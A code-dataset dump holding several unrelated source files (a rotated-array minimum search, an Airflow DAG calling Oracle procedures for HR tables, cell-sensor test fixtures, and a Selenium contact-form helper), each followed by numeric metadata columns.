Sukhrobjon/career-lab
|
67bc38c0eb3b47248157f618cb34ed2bdd44fc78
|
[
"MIT"
] | null | null | null |
def find_pivot_index(nums):
"""
Suppose a sorted array A is rotated at some pivot unknown to you
beforehand. (i.e., 0 1 2 4 5 6 7 might become 4 5 6 7 0 1 2).
Find the minimum element. NOTE: The array will not contain duplicates.
"""
min_num = nums[0]
pivot_index = 0
left = 0
right = len(nums) - 1
if left == right:
return pivot_index, nums[pivot_index]
while left <= right:
mid = (left + right) // 2
print(nums[mid])
if min_num > nums[mid]:
min_num = nums[mid]
pivot_index = mid
right = mid - 1
else:
left = mid + 1
return pivot_index, min_num
def find_pivot_index_in_duplicates(nums):
"""
Suppose a sorted array A is rotated at some pivot unknown to you
beforehand. (i.e., 0 1 2 4 5 6 7 might become 4 5 6 7 0 1 2).
Find the minimum element. NOTE: The array will contain duplicates.
"""
min_num = nums[0]
pivot_index = 0
left = 0
right = len(nums) - 1
if left == right:
return pivot_index, nums[pivot_index]
while left <= right:
mid = (left + right) // 2
print(nums[mid], mid)
if min_num > nums[mid]:
min_num = nums[mid]
pivot_index = mid
right = mid - 1
# elif min_num == nums[mid]:
# # continue
else:
left = mid + 1
return pivot_index, min_num
# nums = [4, 5, 6, 7, 0, 1, 2]
nums = [10, 10, 10, 10, 1]
single = [5, 5, 5, 5, 3]
result = find_pivot_index_in_duplicates(nums)
print(result)
| 25
| 74
| 0.55625
| 245
| 1,600
| 3.514286
| 0.220408
| 0.150987
| 0.092915
| 0.023229
| 0.891986
| 0.891986
| 0.826945
| 0.818815
| 0.818815
| 0.739837
| 0
| 0.06
| 0.34375
| 1,600
| 63
| 75
| 25.396825
| 0.76
| 0.28875
| 0
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0
| 0
| 0.157895
| 0.078947
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
372575e3b213d1b064d53cd656ebb576d0c5557c
| 12,117
|
py
|
Python
|
etl_base/dags/sqlg_jobs_HRM.py
|
buckylee2019/sqlg-airflow
|
37610a23b99bea8d9fdc8b066a01736ff2ff0c9d
|
[
"Apache-2.0"
] | null | null | null |
etl_base/dags/sqlg_jobs_HRM.py
|
buckylee2019/sqlg-airflow
|
37610a23b99bea8d9fdc8b066a01736ff2ff0c9d
|
[
"Apache-2.0"
] | null | null | null |
etl_base/dags/sqlg_jobs_HRM.py
|
buckylee2019/sqlg-airflow
|
37610a23b99bea8d9fdc8b066a01736ff2ff0c9d
|
[
"Apache-2.0"
] | 1
|
2022-03-10T03:47:35.000Z
|
2022-03-10T03:47:35.000Z
|
# -*- coding: utf-8 -*-
# Author : Jesse Wei
# LastUpdate : 2020/10/04
# Impact : Jobs generated by SQLG
# Message : Humanity towards others, we live by sharing. Fear can hold you prisoner, only hope can set you free.
# from __future__ import print_function
import logging
import airflow
from datetime import datetime, timedelta
from airflow.operators.sensors import ExternalTaskSensor
from airflow.operators.python_operator import PythonOperator
from airflow.operators.bash_operator import BashOperator
from airflow.contrib.sensors.file_sensor import FileSensor
from airflow import models
from airflow.models import Variable
from acme.operators.sqlg_oracle import OracleOperatorWithTemplatedParams
from airflow.operators.oracle_operator import OracleOperator
# DB_NAME = 'DWH'
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_DEGREEMSF"
HR_DEGREEMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_ETSMSF"
HR_ETSMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_JOBRANK"
HR_JOBRANK = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_PEOMSF"
HR_PEOMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_PLACEMSF"
HR_PLACEMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_TYPMSF"
HR_TYPMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_HR_EMPMSF"
MV_HR_EMPMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_HR_EMPMSF_H"
MV_HR_EMPMSF_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_HR_EMPMSF_CN"
MV_HR_EMPMSF_CN = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_HR_EMPMSF_CN_H"
MV_HR_EMPMSF_CN_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_HR_EMPMSF_VN"
MV_HR_EMPMSF_VN = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_HR_EMPMSF_VN_H"
MV_HR_EMPMSF_VN_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_DEPMSF"
HR_DEPMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_DEPMSF_H"
HR_DEPMSF_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_DEPMSF_CN"
HR_DEPMSF_CN = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_DEPMSF_CN_H"
HR_DEPMSF_CN_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_DEPMSF_VN"
HR_DEPMSF_VN = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_DEPMSF_VN_H"
HR_DEPMSF_VN_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "PEOMSF2"
PEOMSF2 = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_BTYPMSF"
HR_BTYPMSF = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_XXCONTRACT_NQJ"
HR_XXCONTRACT_NQJ = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_LOA_HISTORY"
HR_LOA_HISTORY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "HR_LOA_RETURN"
HR_LOA_RETURN = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_PERSONNEL_CATEGORY"
SDM_PERSONNEL_CATEGORY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_SENIORITY_AT_WNC"
SDM_SENIORITY_AT_WNC = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_JOB_GRADE"
SDM_JOB_GRADE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_JOB_FAMILY"
SDM_JOB_FAMILY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_JOB_CATEGORY"
SDM_JOB_CATEGORY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_WORK_PLACE"
SDM_WORK_PLACE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_CAUSE_OF_RESIGNING"
SDM_CAUSE_OF_RESIGNING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_EDUCATION"
SDM_EDUCATION = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_EMPLOYMENT_TYPE"
SDM_EMPLOYMENT_TYPE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_STAFF_STATUS"
SDM_STAFF_STATUS = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_DEPARTMENT"
SDM_DEPARTMENT = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_DEPARTMENT_H"
SDM_DEPARTMENT_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_EMPLOYEE"
SDM_EMPLOYEE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_EMPLOYEE_H"
SDM_EMPLOYEE_H = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_HEADCOUNT_BUDGET"
SDM_HEADCOUNT_BUDGET = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_NEWCOMERS"
SDM_NEWCOMERS = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_HEADCOUNT"
FCT_HEADCOUNT = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
",MN_BEG_DT"+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_HEADCOUNT_FULFILL_RATE"
FCT_HEADCOUNT_FULFILL_RATE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
| 27.791284
| 118
| 0.633408
| 1,453
| 12,117
| 4.854783
| 0.087405
| 0.139495
| 0.104621
| 0.081372
| 0.813864
| 0.810746
| 0.810746
| 0.807343
| 0.807343
| 0.807343
| 0
| 0.001145
| 0.206982
| 12,117
| 435
| 119
| 27.855172
| 0.732855
| 0.084344
| 0
| 0.602941
| 1
| 0
| 0.287305
| 0.006338
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.032353
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3730609d0587a60db464887b9e2ef29dc7a1a964
| 8,423
|
py
|
Python
|
sitch/tests/christmas_tree/device_samples.py
|
codecuisine/sensor
|
06fb0908178af1ab673b95e7f435b873cc62e61b
|
[
"ECL-2.0",
"Apache-2.0",
"BSD-2-Clause"
] | 68
|
2016-08-08T17:28:59.000Z
|
2021-11-26T09:31:52.000Z
|
sitch/tests/christmas_tree/device_samples.py
|
codecuisine/sensor
|
06fb0908178af1ab673b95e7f435b873cc62e61b
|
[
"ECL-2.0",
"Apache-2.0",
"BSD-2-Clause"
] | 61
|
2016-08-20T21:01:01.000Z
|
2020-07-22T06:10:45.000Z
|
sitch/tests/christmas_tree/device_samples.py
|
codecuisine/sensor
|
06fb0908178af1ab673b95e7f435b873cc62e61b
|
[
"ECL-2.0",
"Apache-2.0",
"BSD-2-Clause"
] | 40
|
2017-01-28T23:06:22.000Z
|
2021-08-13T15:09:43.000Z
|
class DeviceSamples(object):
gps_device_loc_a = {"scan_program": "gpsd",
"event_type": "gps_scan",
"site_name": "test_site",
"sensor_id": "test_sensor_id",
"sensor_name": "test_sensor",
"type": "Feature",
"sat_time": "2017-03-25T00:30:48.000Z",
"time_drift": 2,
"sys_time": "2017-03-25T00:32:48.416592",
"event_timestamp": "2016-05-07 04:10:35",
"location": {
"type": "Point",
"coordinates": [-122.431297, 37.773972]}}
gps_device_loc_b = {"scan_program": "gpsd",
"event_type": "gps_scan",
"site_name": "test_site",
"sensor_id": "test_sensor_id",
"sensor_name": "test_sensor",
"type": "Feature",
"sat_time": "2017-03-25T00:30:48.000Z",
"time_drift": 2,
"sys_time": "2017-03-25T00:32:48.416592",
"event_timestamp": "2016-05-07 04:10:35",
"location": {
"type": "Point",
"coordinates": [-100.431297, 32.773972]}}
geoip_loc_a = {"scan_program": "geoip",
"event_type": "geoip_scan",
"event_timestamp": "2016-05-07 04:10:35",
"type": "Feature",
"location": {
"type": "Point",
"coordinates": [-122.431297, 37.773972]}}
geoip_loc_b = {"scan_program": "geoip",
"event_type": "geoip_scan",
"event_timestamp": "2016-05-07 04:10:35",
"type": "Feature",
"location": {
"type": "Point",
"coordinates": [-100.431297, 32.773972]}}
gsm_modem_1 = {"platform": "PLATFORM-NAME",
"event_type": "gsm_modem_scan",
"scan_results": [
{'bsic': '12', 'mcc': '310', 'rla': 0, 'lac': '178d',
'mnc': '411', 'txp': 05, 'rxl': 33, 'cell': 0,
'rxq': 00, 'ta': 255, 'cellid': '000f', 'arfcn': 154},
{'cell': 1, 'rxl': 20, 'lac': '178d', 'bsic': '30',
'mnc': '411', 'mcc': '310', 'cellid': '0010',
'arfcn': 128},
{'cell': 2, 'rxl': 10, 'lac': '178d', 'bsic': '00',
'mnc': '411', 'mcc': '310', 'cellid': '76e2',
'arfcn': 179},
{'cell': 3, 'rxl': 10, 'lac': '178d', 'bsic': '51',
'mnc': '411', 'mcc': '310', 'cellid': '1208',
'arfcn': 181},
{'cell': 4, 'rxl': 31, 'lac': 0000, 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 237},
{'cell': 5, 'rxl': 23, 'lac': '0000', 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 238},
{'cell': 6, 'rxl': 23, 'lac': '0000', 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 236}
],
"scan_start": "",
"scan_finish": "2016-05-07 02:36:50",
"event_timestamp": '2016-05-07 04:10:35',
"scan_program": "gsm_modem",
"site_name": "test_site",
"sensor_id": "test_sensor_id",
"sensor_name": "test_sensor",
"scanner_public_ip": "66.18.61.61",
"band": "GSM850_MODE"}
# This one triggers a no-neighbor alert
gsm_modem_2 = {"platform": "PLATFORM-NAME",
"event_type": "gsm_modem_scan",
"scan_results": [
{'bsic': '12', 'mcc': '310', 'rla': 0, 'lac': '178d',
'mnc': '411', 'txp': 05, 'rxl': 33, 'cell': 0,
'rxq': 00, 'ta': 255, 'cellid': '000f', 'arfcn': 154},
{'cell': 1, 'rxl': 31, 'lac': 0000, 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 237},
{'cell': 2, 'rxl': 23, 'lac': '0000', 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 238},
{'cell': 3, 'rxl': 23, 'lac': '0000', 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 181},
{'cell': 4, 'rxl': 31, 'lac': 0000, 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 237},
{'cell': 5, 'rxl': 23, 'lac': '0000', 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 238},
{'cell': 6, 'rxl': 23, 'lac': '0000', 'bsic': '00',
'mnc': '', 'mcc': '', 'cellid': 'ffff', 'arfcn': 236}
],
"scan_start": "",
"scan_finish": "2016-05-07 02:36:50",
"event_timestamp": '2016-05-07 04:10:35',
"scan_program": "gsm_modem",
"site_name": "test_site",
"sensor_id": "test_sensor_id",
"sensor_name": "test_sensor",
"scanner_public_ip": "66.18.61.61",
"band": "GSM850_MODE"}
kal_scan_1 = {'platform': 'PLATFORM-NAME',
'event_type': 'kalibrate_scan',
'scan_finish': '2016-05-07 04:14:30',
'site_name': 'SITE_NAME',
'scanner_public_ip': '0.0.0.0',
'sensor_name': 'SENSOR_NAME',
'sensor_id': 'SENSOR_ID',
'scan_results': [
{'channel_detect_threshold': '279392.605625',
'power': '5909624.47', 'final_freq': '869176168',
'mod_freq': 23832.0, 'band': 'GSM-850',
'sample_rate': '270833.002142', 'gain': '80.0',
'base_freq': 869200000.0, 'device':
'0: Generic RTL2832U OEM', 'modifier': '-',
'channel': '12'}, # This should not be in the feed DB
{'channel_detect_threshold': '279392.605625',
'power': '5909624.47', 'final_freq': '869176168',
'mod_freq': 23832.0, 'band': 'GSM-850',
'sample_rate': '270833.002142', 'gain': '80.0',
'base_freq': 869200000.0, 'device':
'0: Generic RTL2832U OEM', 'modifier': '-',
'channel': '128'},
{'channel_detect_threshold': '279392.605625',
'power': '400160.02', 'final_freq': '874376406',
'mod_freq': 23594.0, 'band': 'GSM-850',
'sample_rate': '270833.002142', 'gain': '80.0',
'base_freq': 874400000.0, 'device':
'0: Generic RTL2832U OEM', 'modifier': '-',
'channel': '154'},
{'channel_detect_threshold': '279392.605625',
'power': '401880.05', 'final_freq': '889829992',
'mod_freq': 29992.0, 'band': 'GSM-850',
'sample_rate': '270833.002142', 'gain': '80.0',
'base_freq': 889800000.0, 'device':
'0: Generic RTL2832U OEM', 'modifier': '+',
'channel': '231'},
{'channel_detect_threshold': '279392.605625',
'power': '397347.54', 'final_freq': '891996814',
'mod_freq': 3186.0, 'band': 'GSM-850',
'sample_rate': '270833.002142', 'gain': '80.0',
'base_freq': 892000000.0, 'device':
'0: Generic RTL2832U OEM', 'modifier': '-',
'channel': '242'}],
'scan_start': '2016-05-07 04:10:35',
'event_timestamp': '2016-05-07 04:10:35',
'scan_program': 'kalibrate'}
| 54.694805
| 78
| 0.389054
| 777
| 8,423
| 4.043758
| 0.212355
| 0.021006
| 0.028008
| 0.028644
| 0.846913
| 0.813813
| 0.762253
| 0.762253
| 0.701464
| 0.701464
| 0
| 0.187797
| 0.425976
| 8,423
| 153
| 79
| 55.052288
| 0.462048
| 0.008429
| 0
| 0.684932
| 0
| 0
| 0.357648
| 0.02635
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2eace84ba4aec462e25df23624f099926a5c1100
| 3,368
|
py
|
Python
|
fixture/contact.py
|
AdKrajan/python_training
|
1315b58c07db4d02bc46ae65e5c358fdbf78dbc0
|
[
"Apache-2.0"
] | null | null | null |
fixture/contact.py
|
AdKrajan/python_training
|
1315b58c07db4d02bc46ae65e5c358fdbf78dbc0
|
[
"Apache-2.0"
] | null | null | null |
fixture/contact.py
|
AdKrajan/python_training
|
1315b58c07db4d02bc46ae65e5c358fdbf78dbc0
|
[
"Apache-2.0"
] | null | null | null |
class ContactHelper:
def __init__(self, app):
self.app = app
def open_add_contact_page(self):
# open add creation new contact
wd = self.app.wd
wd.find_element_by_link_text("add new").click()
def fill_form(self, contact):
# fill contacts form
wd = self.app.wd
self.open_add_contact_page()
wd.find_element_by_name("firstname").click()
wd.find_element_by_name("firstname").clear()
wd.find_element_by_name("firstname").send_keys(contact.first_name)
wd.find_element_by_name("lastname").click()
wd.find_element_by_name("lastname").clear()
wd.find_element_by_name("lastname").send_keys(contact.last_name)
wd.find_element_by_name("nickname").click()
wd.find_element_by_name("nickname").clear()
wd.find_element_by_name("nickname").send_keys(contact.nick)
wd.find_element_by_name("home").click()
wd.find_element_by_name("home").clear()
wd.find_element_by_name("home").send_keys(contact.home_phone)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").clear()
wd.find_element_by_name("mobile").send_keys(contact.mobile_phone)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(contact.email)
wd.find_element_by_xpath("//div[@id='content']/form/input[21]").click()
self.back_to_contacts_list()
def modification_first_contact(self, contact):
wd = self.app.wd
self.select_first_contact(wd)
# find edit button
wd.find_element_by_xpath("//table[@id='maintable']/tbody/tr[2]/td[8]/a/img").click()
wd.find_element_by_name("firstname").click()
wd.find_element_by_name("firstname").clear()
wd.find_element_by_name("firstname").send_keys(contact.first_name)
wd.find_element_by_name("lastname").click()
wd.find_element_by_name("lastname").clear()
wd.find_element_by_name("lastname").send_keys(contact.last_name)
wd.find_element_by_name("nickname").click()
wd.find_element_by_name("nickname").clear()
wd.find_element_by_name("nickname").send_keys(contact.nick)
wd.find_element_by_name("home").click()
wd.find_element_by_name("home").clear()
wd.find_element_by_name("home").send_keys(contact.home_phone)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").clear()
wd.find_element_by_name("mobile").send_keys(contact.mobile_phone)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(contact.email)
wd.find_element_by_name("update").click()
self.back_to_contacts_list()
def delete_first_contact(self):
wd = self.app.wd
self.select_first_contact(wd)
# find button delete
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.back_to_contacts_list()
def select_first_contact(self, wd):
wd.find_element_by_name("selected[]").click()
def back_to_contacts_list(self):
wd = self.app.wd
wd.find_element_by_link_text("home").click()
| 43.74026
| 92
| 0.674584
| 481
| 3,368
| 4.336798
| 0.133056
| 0.129434
| 0.267977
| 0.309204
| 0.825024
| 0.785714
| 0.77373
| 0.74257
| 0.74257
| 0.715244
| 0
| 0.002186
| 0.184976
| 3,368
| 77
| 93
| 43.74026
| 0.757741
| 0.024941
| 0
| 0.71875
| 0
| 0
| 0.119207
| 0.037805
| 0
| 0
| 0
| 0
| 0
| 1
| 0.109375
| false
| 0
| 0
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
2eb2974027709cc1e0ec9dc6c67cf2fab7162c13
| 4,875
|
py
|
Python
|
model/model_config.py
|
shijun18/TMLI-PLAN
|
0097d5674852eba75487b153600fc1cd5518b2a8
|
[
"MIT"
] | 6
|
